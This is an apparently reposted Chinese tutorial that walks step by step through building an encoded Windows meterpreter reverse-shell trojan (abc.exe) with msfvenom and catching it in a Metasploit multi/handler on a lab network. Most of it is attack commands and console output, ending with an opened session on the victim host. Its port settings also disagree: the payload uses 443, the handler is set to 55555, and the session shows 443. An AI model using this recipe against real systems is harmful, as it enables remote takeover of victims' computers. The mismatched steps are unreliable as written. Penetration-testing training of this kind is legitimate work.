本文共 3815 字,大约阅读时间需要 12 分钟。
准备工具
1、KALI系统 IP 10.10.10.131
2、受害系统 IP 10.10.10.133
步骤:
1、生成木马控制程序
root@kali:~# msfvenom -p windows/meterpreter/reverse_tcp -e x86/shikata_ga_nai -i 5 -b '\x00' LHOST=10.10.10.131 LPORT=443 -f exe > abc.exe
No platform was selected, choosing Msf::Module::Platform::Windows from the payload
No Arch selected, selecting Arch: x86 from the payload
Found 1 compatible encoders
Attempting to encode payload with 5 iterations of x86/shikata_ga_nai
x86/shikata_ga_nai succeeded with size 360 (iteration=0)
x86/shikata_ga_nai succeeded with size 387 (iteration=1)
x86/shikata_ga_nai succeeded with size 414 (iteration=2)
x86/shikata_ga_nai succeeded with size 441 (iteration=3)
x86/shikata_ga_nai succeeded with size 468 (iteration=4)
x86/shikata_ga_nai chosen with final size 468
Payload size: 468 bytes
注意: LHOST和LPORT是本地自己的IP不是受害者的IP
2、通过命令启动Metasploit
root@kali:~# msfconsole
+-------------------------------------------------------+
| METASPLOIT by Rapid7 |
+---------------------------+---------------------------+
| __________________ | |
| ==c(______(o(______(_() | |""""""""""""|======[*** |
| )=\ | | EXPLOIT \ |
| // \\ | |_____________\_______ |
| // \\ | |==[msf >]============\ |
| // \\ | |______________________\ |
| // RECON \\ | \(@)(@)(@)(@)(@)(@)(@)/ |
| // \\ | ********************* |
+---------------------------+---------------------------+
| o O o | \'\/\/\/'/ |
| o O | )======( |
| o | .' LOOT '. |
| |^^^^^^^^^^^^^^|l___ | / _||__ \ |
| | PAYLOAD |""\___, | / (_||_ \ |
| |________________|__|)__| | | __||_) | |
| |(@)(@)"""**|(@)(@)**|(@) | " || " |
| = = = = = = = = = = = = | '--------------' |
+---------------------------+---------------------------+
Save 45% of your time on large engagements with Metasploit Pro
Learn more on http://rapid7.com/metasploit
=[ metasploit v4.11.5-2015103001 ]
+ -- --=[ 1500 exploits - 864 auxiliary - 251 post ]
+ -- --=[ 432 payloads - 37 encoders - 8 nops ]
+ -- --=[ Free Metasploit Pro trial: http://r-7.co/trymsp ]
3、使用handler模块
msf > use exploit/multi/handler
4、查看handler参数
msf exploit(handler) > show options
Module options (exploit/multi/handler):
Name Current Setting Required Description
---- --------------- -------- -----------
Exploit target:
Id Name
-- ----
0 Wildcard Target
5、shellcode设置
msf exploit(handler) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf exploit(handler) > SHOW
[-] Unknown command: SHOW.
msf exploit(handler) > show options
Module options (exploit/multi/handler):
Name Current Setting Required Description
---- --------------- -------- -----------
Payload options (windows/meterpreter/reverse_tcp):
Name Current Setting Required Description
---- --------------- -------- -----------
EXITFUNC process yes Exit technique (Accepted: '', seh, thread, process, none)
LHOST 10.10.10.131 yes The listen address
LPORT 4444 yes The listen port
Exploit target:
Id Name
-- ----
0 Wildcard Target
6、修改LHOST和LPORT端口
msf exploit(handler) > set LHOST 10.10.10.131
LHOST => 10.10.10.131
msf exploit(handler) > set LPORT 55555
LPORT => 55555
msf exploit(handler) > show options
Module options (exploit/multi/handler):
Name Current Setting Required Description
---- --------------- -------- -----------
Payload options (windows/meterpreter/reverse_tcp):
Name Current Setting Required Description
---- --------------- -------- -----------
EXITFUNC process yes Exit technique (Accepted: '', seh, thread, process, none)
LHOST 10.10.10.131 yes The listen address
LPORT 55555 yes The listen port
7、执行exploit命令
msf exploit(handler) > exploit
8、受害者执行abc.exe文件
9、验证
[*] Started reverse handler on 10.10.10.131:443
[*] Starting the payload handler...
[*] Sending stage (885806 bytes) to 10.10.10.133
[*] Meterpreter session 1 opened (10.10.10.131:443 -> 10.10.10.133:1049) at 2015-12-07 23:41:20 +0800
转载地址:http://dnuti.baihongyu.com/